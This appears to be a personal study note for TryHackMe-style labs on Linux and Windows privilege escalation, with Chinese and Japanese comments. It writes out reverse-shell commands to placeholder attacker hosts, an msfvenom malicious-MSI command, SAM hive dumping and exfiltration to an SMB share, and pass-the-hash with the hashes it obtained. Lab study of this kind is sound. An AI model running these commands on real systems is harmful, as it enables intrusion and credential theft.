Open WDavid404 opened 9 months ago
cat /etc/crontab
Note: " *" means the job will run every minute.
crontab -l
: Listing cron jobs for the current user
ls -lah /etc/cron*
The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:
1. System administrators need to run a script at regular intervals.
2. They create a cron job to do this
3. After a while, the script becomes useless, and they delete it
4. They do not clean the relevant cron job
Note: If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file.
例子:
You can see the backup.sh script was configured to run every minute.
We can edit backup.sh as below to start reverse shell
#! /bin/bash
bash -i >& /dev/tcp/HOST/PORT 0>&1
chmod +x backup.sh
For demo purposes, we will use the script below:
#include <unistd.h>
void main()
{
setuid(0);
setgid(0);
system("thm");
}
This script tries to launch a system binary called “thm” but the example can easily be replicated with any binary.
By 'chmod u+s', Our user now has access to the “path” script with SUID bit set.
Find writable folders: find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u
在PATH加上/tmp: export PATH=/tmp:$PATH
create a 'thm' file that call /bin/bash
NFS (Network File Sharing) configuration is kept in the /etc/exports
file. This file is created during the NFS server installation and can usually be read by users.
Unattended Windows Installations
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Powershell History
On cmd prompt:
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
cmdkey /list
: list saved credentials.
then, you can use the credentials by runas
runas /savecred /user:{username} cmd.exe
IIS Configuration
Retrieve Credentials from Software: PuTTY
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.
schtasks /query /tn vulntask /fo list /v
to list the tasks.
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1
If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use icacls:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like.
then,
C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
run the task, And you will receive the reverse shell with taskusr1 privileges as expected:
C:\> schtasks /run /tn vulntask
Windows installer files (also known as .msi files) can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges. This method requires two registry values to be set. You can query these from the command line using the commands below.
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
この値が有効である(値が1である)場合、msiファイルは常にSYSTEM権限で実行されるので、権限昇格に利用されてしまいます。 必要がなければ、レジストリエディタで0に修正しましょう。
Generate a malicious .msi file using msfvenom, as seen below:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.199.87 LPORT=LOCAL_PORT -f msi -o malicious.msi
run it
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
Windows services are managed by the Service Control Manager (SCM).
command: sc qc <service name>
to check the service configuration
check permission: icacls <service path. e.g. C:\PROGRA~2\SYSTEM~1\WService.exe>
All of the services configurations are stored on the registry under HKLM\SYSTEM\CurrentControlSet\Services\:
To reset some service (e.g windowsscheduler)
sc stop windowsscheduler
sc start windowsscheduler
To grant full permissions to the Everyone group
icacls WService.exe /grant Everyone:F
C:\> sc qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: disk sorter enterprise
。。。
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
。。。
系统有下面3种解读: C:\MyPrograms\Disk.exe | 参数1: Sorter | 参数2: Enterprise\bin\disksrs.exe C:\MyPrograms\Disk Sorter.exe | 参数: Enterprise\bin\disksrs.exe | C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe |
accesschk64.exe -qlc thmservice
更改service的binPath,然后重新启动
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc stop THMService
sc start THMService
whoami /priv (run as administrator)
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
mkdir share
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation [] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821 [] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
5. use the Administrator's hash to perform a Pass-the-Hash attack and gain access to the target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.117.69
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation [] Requesting shares on 10.10.175.90..... [] Found writable share ADMIN$ [] Uploading file nfhtabqO.exe [] Opening SVCManager on 10.10.175.90..... [] Creating service RoLE on 10.10.175.90..... [] Starting service RoLE..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.1821] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
### SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges
例子:
We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows application used to provide Ease of Access options during the lock screen。
Since Utilman is run with SYSTEM privileges, we will effectively gain SYSTEM privileges if we replace the original binary for any payload we like.
1. taking ownership of it with the following command:
C:> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "WINPRIVESC2\thmtakeownership".
2. give your user full permissions over utilman.exe
`icacls C:\Windows\System32\Utilman.exe /grant <user name>:F`
3. replace utilman.exe with a copy of cmd.exe:
`C:\Windows\System32\> copy cmd.exe utilman.exe`
### SeImpersonate / SeAssignPrimaryToken
These privileges allow a process to impersonate other users and act on their behalf.
wmic tool:
wmic product get name,version,vendor
Note: wmic product command may not return all installed programs. Depending on how some of the programs were installed, they might not get listed here. It is always worth checking desktop shortcuts, available services or generally any trace that indicates the existence of additional software that might be vulnerable.
online info: https://www.exploit-db.com/ https://packetstormsecurity.com/
Case Study: Druva inSync 6.6.3
PayloadsAllTheThings - Windows Privilege Escalation Priv2Admin - Abusing Windows Privileges RogueWinRM Exploit Potatoes Decoder's Blog Token Kidnapping Hacktricks - Windows Local Privilege Escalation
Linux Privilege Escalation
Enumeration
hostname
cat /proc/version(可以看到gcc version)
cat /etc/issue
cat /etc/os-release
uname -a
ps -A: View all running processes
ps axjf: View process tree (see the tree formation until ps axjf is run below)
env
sudo -l
ip route : command to see which network routes exist.
ls
id
/etc/passwd
history
ifconfig
routel
ss -anp
ss -tlpn
cat /etc/crontab
cat /etc/iptables/rules.v4
ls -lah /etc/cron*
crontab -l
sudo crontab -l
grep "CRON" /var/log/syslog https://github.com/WDavid404/Note_tryhackme/issues/2#issuecomment-1767980521
dpkg -l: list applications installed by dpkg
find / -writable -type d 2>/dev/null
cat /etc/fstab: lists all drives that will be mounted at boot time.
mount
lsblk: to view all available disks.
lsmod: enumerate the loaded kernel modules
/sbin/modinfo libata: Displaying additional information about a module 'libata'
netcat
find Command
Automated Enumeration Tools
Privilege Escalation: Kernel Exploits
On target machine $ cd /tmp/ $ wget:9000/ofs
$ chmod +x ofs
$ ./ofs
User xxxx may run the following commands on XXX-M-XHXHK987AW: (ALL) ALL
openssl passwd -1 -salt xxxxxxxx password $1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.
getcap -r / 2>/dev/null
-r: enables recursive search.
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep /usr/bin/dumpcap cap_net_admin,cap_net_raw=eip /usr/bin/fping cap_net_raw=ep /usr/bin/ping cap_net_raw=ep
上記出力結果を踏まえて、/usr/bin/pingファイルにcap_net_rawというcapabilityが設定されているのが分かります。pingコマンドはRAWソケットとPACKETソケットを使用しています。capabilityという仕組みを用いて、必要な権限だけを与えています。